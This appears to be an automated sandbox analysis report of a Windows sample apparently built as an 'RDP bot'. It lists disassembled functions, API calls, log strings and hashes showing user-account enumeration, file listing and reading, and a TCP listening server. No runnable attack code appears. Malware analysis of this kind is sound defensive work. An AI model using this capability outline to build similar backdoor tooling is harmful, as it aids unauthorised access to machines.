[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA5576DAD, 00007FFDA5577262
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFDA5576E87, 00007FFDA5576ED3, 00007FFDA5576F53
mem_alloc, xrefs: 00007FFDA5576DA6, 00007FFDA557725B
[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x), xrefs: 00007FFDA55770B0

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
API String ID: 3624467404-104752423
Opcode ID: 5d979e8033afa08c63d6ca72cd96b038feaa2c773d23a315cb30481733547519
Instruction ID: 0f80841b7ccf90a770420a4707d7504c0522baacada75bf7d6db31a08332308d
Opcode Fuzzy Hash: 5d979e8033afa08c63d6ca72cd96b038feaa2c773d23a315cb30481733547519
Instruction Fuzzy Hash: BFF1B02AB1EA4B86FB228F54E46437923A1EF86F44F550832D94E47396DF3CE845C748

Function 00007FFDA55D5BF3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32 ref: 00007FFDA55D5C39
strcpy.MSVCRT ref: 00007FFDA55D5C54
FindFirstFileA.KERNEL32 ref: 00007FFDA55D5D27
GetLastError.KERNEL32 ref: 00007FFDA55D5D43
GetLastError.KERNEL32 ref: 00007FFDA55D5D72
FindClose.KERNEL32 ref: 00007FFDA55D5D90

Part of subcall function 00007FFDA55D9DC2: fwrite.MSVCRT ref: 00007FFDA55D9E6E
Part of subcall function 00007FFDA55D9DC2: fflush.MSVCRT ref: 00007FFDA55D9E7A

Strings

C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFDA55D5C82, 00007FFDA55D5CBA, 00007FFDA55D5CF2
[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FFDA55D5D64
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FFDA55D5DA8
(name != NULL), xrefs: 00007FFDA55D5CC1
(resume_handle != NULL), xrefs: 00007FFDA55D5CF9
fs_dir_list, xrefs: 00007FFDA55D5C90, 00007FFDA55D5CC8, 00007FFDA55D5D00, 00007FFDA55D5D5D, 00007FFDA55D5DA1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55D5C97, 00007FFDA55D5CCF, 00007FFDA55D5D07
(path != NULL), xrefs: 00007FFDA55D5C89

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 4253334766-1535167640
Opcode ID: c09bae0e17e4715884aad229713af89dbee22181e22ac985b1ea5e86cae568b0
Instruction ID: 66d9ac2b97f1569a036576d339e1e623c20be7a6b91b45fbcdedb7f5e14d93fb
Opcode Fuzzy Hash: c09bae0e17e4715884aad229713af89dbee22181e22ac985b1ea5e86cae568b0
Instruction Fuzzy Hash: 8161496BF0F58BC2FA32EE14A4243B82251AF27B55F840172D91E4A3D6DE6CAD458349

Function 00007FF70CAD47A3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNELBASE ref: 00007FF70CAD47E9
_mbscpy.MSVCRT ref: 00007FF70CAD4804
FindFirstFileA.KERNEL32 ref: 00007FF70CAD48D7
GetLastError.KERNEL32 ref: 00007FF70CAD48F3
GetLastError.KERNEL32 ref: 00007FF70CAD4922
FindClose.KERNEL32 ref: 00007FF70CAD4940

Part of subcall function 00007FF70CAD2EF2: fwrite.MSVCRT ref: 00007FF70CAD2F9E
Part of subcall function 00007FF70CAD2EF2: fflush.MSVCRT ref: 00007FF70CAD2FAA

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF70CAD4847, 00007FF70CAD487F, 00007FF70CAD48B7
(resume_handle != NULL), xrefs: 00007FF70CAD48A9
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FF70CAD4958
[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FF70CAD4914
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF70CAD4832, 00007FF70CAD486A, 00007FF70CAD48A2
(name != NULL), xrefs: 00007FF70CAD4871
fs_dir_list, xrefs: 00007FF70CAD4840, 00007FF70CAD4878, 00007FF70CAD48B0, 00007FF70CAD490D, 00007FF70CAD4951
(path != NULL), xrefs: 00007FF70CAD4839

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 1094913617-1535167640
Opcode ID: 74059f7eb4c35c2106d21157995027659ccac9b204c2b1dae819d18839ee3c94
Instruction ID: 2d3461598ba168306475b363f5733dc0b40cd982031ac0b6ee4e6765b695e5a3
Opcode Fuzzy Hash: 74059f7eb4c35c2106d21157995027659ccac9b204c2b1dae819d18839ee3c94
Instruction Fuzzy Hash: FC6149A5E0C69385FA607B95BC44BBCE2506F08398FC40132D99F5B2D9DF3CA88593A5

Function 00007FFDA5576D5F Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDA5576C7F: GetProcessHeap.KERNEL32 ref: 00007FFDA5576CCD
Part of subcall function 00007FFDA5576C7F: HeapFree.KERNEL32 ref: 00007FFDA5576CDE
Part of subcall function 00007FFDA5576C7F: GetProcessHeap.KERNEL32 ref: 00007FFDA5576CF2
Part of subcall function 00007FFDA5576C7F: HeapFree.KERNEL32 ref: 00007FFDA5576D03
Part of subcall function 00007FFDA5576C7F: LocalFree.KERNEL32 ref: 00007FFDA5576D19
Part of subcall function 00007FFDA5576C7F: GetProcessHeap.KERNEL32 ref: 00007FFDA5576D2D
Part of subcall function 00007FFDA5576C7F: HeapFree.KERNEL32 ref: 00007FFDA5576D3E

NetApiBufferFree.NETAPI32 ref: 00007FFDA5577283
NetUserEnum.NETAPI32 ref: 00007FFDA55772F9
GetProcessHeap.KERNEL32 ref: 00007FFDA5577337
HeapAlloc.KERNEL32 ref: 00007FFDA5577348
memcpy.MSVCRT ref: 00007FFDA5577385
GetProcessHeap.KERNEL32 ref: 00007FFDA557738A
HeapFree.KERNEL32 ref: 00007FFDA557739B

Strings

[E] (%s) -> NetUserEnum failed(enum_err=%08lx), xrefs: 00007FFDA5577413
users_sync, xrefs: 00007FFDA55773E3, 00007FFDA557740C, 00007FFDA5577521
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA5576D8D
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA55773EA
[I] (%s) -> Done(sam_user_num=%u), xrefs: 00007FFDA5577528
mem_alloc, xrefs: 00007FFDA5576D86

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: Heap$Free$Process$AllocBufferEnumLocalUsermemcpy
String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
API String ID: 1987963910-3382179125
Opcode ID: 198e3a458fd7efd0016722dae70821c50ccfb0e07ceb64b37177c67457a14052
Instruction ID: 584e8cc4640987761815bddfb6ade7339d6541a4b6b987065962831efb6ac2c4
Opcode Fuzzy Hash: 198e3a458fd7efd0016722dae70821c50ccfb0e07ceb64b37177c67457a14052
Instruction Fuzzy Hash: 3A61D229B1E24F82FA229F54F8603782691AF83F54F240871DD4D07792EF7DE8858709

Function 00007FFDA5BA28BA Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 89networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFDA5BA28D8
WSAGetLastError.WS2_32 ref: 00007FFDA5BA29C2

Part of subcall function 00007FFDA5BA27EA: setsockopt.WS2_32 ref: 00007FFDA5BA281A

htonl.WS2_32 ref: 00007FFDA5BA290A
htons.WS2_32 ref: 00007FFDA5BA291B
bind.WS2_32 ref: 00007FFDA5BA2934
listen.WS2_32 ref: 00007FFDA5BA2949
WSAGetLastError.WS2_32 ref: 00007FFDA5BA295A

Part of subcall function 00007FFDA5BA2072: fwrite.MSVCRT ref: 00007FFDA5BA211E
Part of subcall function 00007FFDA5BA2072: fflush.MSVCRT ref: 00007FFDA5BA212A

WSAGetLastError.WS2_32 ref: 00007FFDA5BA2984

Strings

[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFDA5BA2976
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFDA5BA2A0E
tcp_listen, xrefs: 00007FFDA5BA296F, 00007FFDA5BA2999, 00007FFDA5BA29D3, 00007FFDA5BA2A07
[E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFDA5BA29A0
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFDA5BA29DA

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
API String ID: 3590747132-3524496754
Opcode ID: 3779f479cd93ec59d119e7f6f5f81b68c2f83b1fc2c506983fb18d39a0dbf78a
Instruction ID: a9865576c5dc54be7c65ed72e5ec8e6f27b2454e67802af28d2019e9aa8b6e0b
Opcode Fuzzy Hash: 3779f479cd93ec59d119e7f6f5f81b68c2f83b1fc2c506983fb18d39a0dbf78a
Instruction Fuzzy Hash: FD31A520F0A60E87EA205B25A820376B290BF46FB6F455735EA7E037D6DE7DD5058708

Function 00007FF70CAD1DBC Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF70CAD1DD4
strcmp.MSVCRT ref: 00007FF70CAD1DE7
StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF70CAD1E23
_read.MSVCRT ref: 00007FF70CAD1E79
GetLastError.KERNEL32 ref: 00007FF70CAD1E98

Part of subcall function 00007FF70CAD1A63: FreeLibrary.KERNEL32(?,?,00000000,0000021B15D113D0,00007FF70CAD1E50,?,?,?,?,?,?,00000001,00007FF70CAD1FC3,?,?,00007FF70CAE8508), ref: 00007FF70CAD1AA1
Part of subcall function 00007FF70CAD1A63: GetProcessHeap.KERNEL32(?,?,00000000,0000021B15D113D0,00007FF70CAD1E50,?,?,?,?,?,?,00000001,00007FF70CAD1FC3,?,?,00007FF70CAE8508), ref: 00007FF70CAD1AD4
Part of subcall function 00007FF70CAD1A63: HeapFree.KERNEL32(?,?,00000000,0000021B15D113D0,00007FF70CAD1E50,?,?,?,?,?,?,00000001,00007FF70CAD1FC3,?,?,00007FF70CAE8508), ref: 00007FF70CAD1AE5

Part of subcall function 00007FF70CAD1B1C: GetProcessHeap.KERNEL32(?,?,00000000,00007FF70CAD1E55,?,?,?,?,?,?,00000001,00007FF70CAD1FC3,?,?,00007FF70CAE8508,00000000), ref: 00007FF70CAD1B4D
Part of subcall function 00007FF70CAD1B1C: HeapFree.KERNEL32(?,?,00000000,00007FF70CAD1E55,?,?,?,?,?,?,00000001,00007FF70CAD1FC3,?,?,00007FF70CAE8508,00000000), ref: 00007FF70CAD1B5E

Strings

RDP-Controller, xrefs: 00007FF70CAD1DF4
[E] (%s) -> No a valid run mode(mode=%s), xrefs: 00007FF70CAD1F8B
main, xrefs: 00007FF70CAD1EA3, 00007FF70CAD1F84
service, xrefs: 00007FF70CAD1DDD, 00007FF70CAD1E37
[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu), xrefs: 00007FF70CAD1EAA
standalone, xrefs: 00007FF70CAD1DCA

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
API String ID: 3617873859-308889057
Opcode ID: d9c14cef5bc04db407ce3d4bf2b8283933a1c6e06a4df5d9ff74598ea4119d63
Instruction ID: 1c3118e7dbc9a043800bcbdea3811b351580107aea0254b95a93385bc7e241be
Opcode Fuzzy Hash: d9c14cef5bc04db407ce3d4bf2b8283933a1c6e06a4df5d9ff74598ea4119d63
Instruction Fuzzy Hash: 6C5107D4E0C64385FB607754FC80BBDA2A19F08368FD40532EB4F4629AEF5DE9859272

Function 00007FF70CAD1131 Relevance: 13.6, APIs: 9, Instructions: 120sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,00007FF70CAD1313), ref: 00007FF70CAD116E
_amsg_exit.MSVCRT(?,?,?,00007FF70CAD1313), ref: 00007FF70CAD118D
_initterm.MSVCRT ref: 00007FF70CAD11AE
_initterm.MSVCRT ref: 00007FF70CAD11D3
SetUnhandledExceptionFilter.KERNEL32(?,?,?,00007FF70CAD1313), ref: 00007FF70CAD1212
malloc.MSVCRT ref: 00007FF70CAD1244
strlen.MSVCRT ref: 00007FF70CAD125C
malloc.MSVCRT ref: 00007FF70CAD1268
_cexit.MSVCRT(?,?,?,00007FF70CAD1313), ref: 00007FF70CAD12E3

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
String ID:
API String ID: 3714283218-0
Opcode ID: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
Instruction ID: a04ef1b98618b81a81f505b2b26b9330924ef20d364bf9673053a5008fdfde06
Opcode Fuzzy Hash: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
Instruction Fuzzy Hash: CE5129A5E08A4685FB50FB65FC50A79A3A4BF48BA8F844435DE0F57399DF3CE44083A0

Function 00007FFDA5575EEA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFDA5575F12
WSAGetLastError.WS2_32 ref: 00007FFDA5575F2C

Strings

[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDA5575F4D
tcp_recv, xrefs: 00007FFDA5575F46, 00007FFDA5575F5E, 00007FFDA5575F83
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFDA5575F65
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFDA5575F8A

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 43826edd6c03a2403c5b239c4a6026a88362b96a78e842123ee6fb6f2739a3e5
Instruction ID: 34d74474908344aee466c0af758f4bc0b8c16ccb54445f1c46487481c3889db4
Opcode Fuzzy Hash: 43826edd6c03a2403c5b239c4a6026a88362b96a78e842123ee6fb6f2739a3e5
Instruction Fuzzy Hash: 5E118F98F0E55F92F6125F25A86077812506F23FB0F801B30E93D9A7E7DF5CA9169308

Function 00007FF70CAD4FC5 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.MSVCRT ref: 00007FF70CAD500A
fseek.MSVCRT ref: 00007FF70CAD5029
_errno.MSVCRT ref: 00007FF70CAD503D
_errno.MSVCRT ref: 00007FF70CAD5058
_errno.MSVCRT ref: 00007FF70CAD5117

Part of subcall function 00007FF70CAD2EF2: fwrite.MSVCRT ref: 00007FF70CAD2F9E
Part of subcall function 00007FF70CAD2EF2: fflush.MSVCRT ref: 00007FF70CAD2FAA

_errno.MSVCRT ref: 00007FF70CAD5132
_errno.MSVCRT ref: 00007FF70CAD517F
fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5045, 00007FF70CAD508D, 00007FF70CAD50C0, 00007FF70CAD50F3, 00007FF70CAD511F, 00007FF70CAD522A, 00007FF70CAD5340, 00007FF70CAD540B, 00007FF70CAD54CA, 00007FF70CAD5555, 00007FF70CAD5598
[E] (%s) -> fopen failed(path=%s,errno=%d), xrefs: 00007FF70CAD5126
(((*buf) == NULL) || ((*buf_sz) > 0)), xrefs: 00007FF70CAD50EC
[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d), xrefs: 00007FF70CAD504C
[I] (%s) -> Done(path=%s,buf_sz=%llu), xrefs: 00007FF70CAD559F
[E] (%s) -> fread failed(path=%s,errno=%d), xrefs: 00007FF70CAD5412
NULL, xrefs: 00007FF70CAD5589
[E] (%s) -> ftell failed(path=%s,errno=%d), xrefs: 00007FF70CAD5231
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF70CAD5094, 00007FF70CAD50C7, 00007FF70CAD50FA
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C
[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d), xrefs: 00007FF70CAD5347
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF70CAD53EB
mem_alloc, xrefs: 00007FF70CAD53E4
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF70CAD507F, 00007FF70CAD50B2, 00007FF70CAD50E5
[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld), xrefs: 00007FF70CAD54D1
(path != NULL), xrefs: 00007FF70CAD5086
(buf_sz != NULL), xrefs: 00007FF70CAD50B9

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: _errno$fclosefflushfopenfseekfwrite
String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
API String ID: 2897271634-4120527733
Opcode ID: e3dc7cfb89ace61d4ab551d8823ed4437bc708a7bcac596e6dd945ffa861774d
Instruction ID: 028c761d3a675f624d454e686a1dcd2a7457f8e40e268681df35e2e7688c7a5d
Opcode Fuzzy Hash: e3dc7cfb89ace61d4ab551d8823ed4437bc708a7bcac596e6dd945ffa861774d
Instruction Fuzzy Hash: 63D14AE1E08A0381EA11BB55FC40FB8A761AF55799FC44132DA0F476A9EF3CE985C360

Function 00007FFDA5BA3AA7 Relevance: 66.8, APIs: 10, Strings: 28, Instructions: 327
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDA5BA3AC2
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDA5BA3AEF
CreateThread.KERNEL32 ref: 00007FFDA5BA3B3B
CreateThread.KERNEL32 ref: 00007FFDA5BA3B9B
CreateThread.KERNEL32 ref: 00007FFDA5BA3BFB
GetLastError.KERNEL32 ref: 00007FFDA5BA3C52
GetLastError.KERNEL32 ref: 00007FFDA5BA3D6E
GetLastError.KERNEL32 ref: 00007FFDA5BA3E46

Part of subcall function 00007FFDA5BA2072: fwrite.MSVCRT ref: 00007FFDA5BA211E
Part of subcall function 00007FFDA5BA2072: fflush.MSVCRT ref: 00007FFDA5BA212A

GetLastError.KERNEL32 ref: 00007FFDA5BA3F4E

Part of subcall function 00007FFDA5BA2072: EnterCriticalSection.KERNEL32 ref: 00007FFDA5BA2143
Part of subcall function 00007FFDA5BA2072: LeaveCriticalSection.KERNEL32 ref: 00007FFDA5BA216B
Part of subcall function 00007FFDA5BA2072: CopyFileA.KERNEL32 ref: 00007FFDA5BA21C8

GetLastError.KERNEL32 ref: 00007FFDA5BA404C

Strings

P, xrefs: 00007FFDA5BA3DF5
[I] (%s) -> %s, xrefs: 00007FFDA5BA3C41
routine_tx, xrefs: 00007FFDA5BA3C11
, xrefs: 00007FFDA5BA406A
P, xrefs: 00007FFDA5BA4097
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu), xrefs: 00007FFDA5BA3D80
routine_gc, xrefs: 00007FFDA5BA3B51
P, xrefs: 00007FFDA5BA3CD5
P, xrefs: 00007FFDA5BA3FC6
routine_accept, xrefs: 00007FFDA5BA3BB1
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu), xrefs: 00007FFDA5BA3C64
[I] (%s) -> CreateThread(%s) done, xrefs: 00007FFDA5BA3B5F, 00007FFDA5BA3BBF, 00007FFDA5BA3C1F
, xrefs: 00007FFDA5BA3E64
, xrefs: 00007FFDA5BA3F6C
~, xrefs: 00007FFDA5BA3DEC
server_init, xrefs: 00007FFDA5BA3B58, 00007FFDA5BA3BB8, 00007FFDA5BA3C18, 00007FFDA5BA3C3A, 00007FFDA5BA3C5D, 00007FFDA5BA3D79, 00007FFDA5BA3E51, 00007FFDA5BA3F59, 00007FFDA5BA4057, 00007FFDA5BA414A
Done, xrefs: 00007FFDA5BA3C33
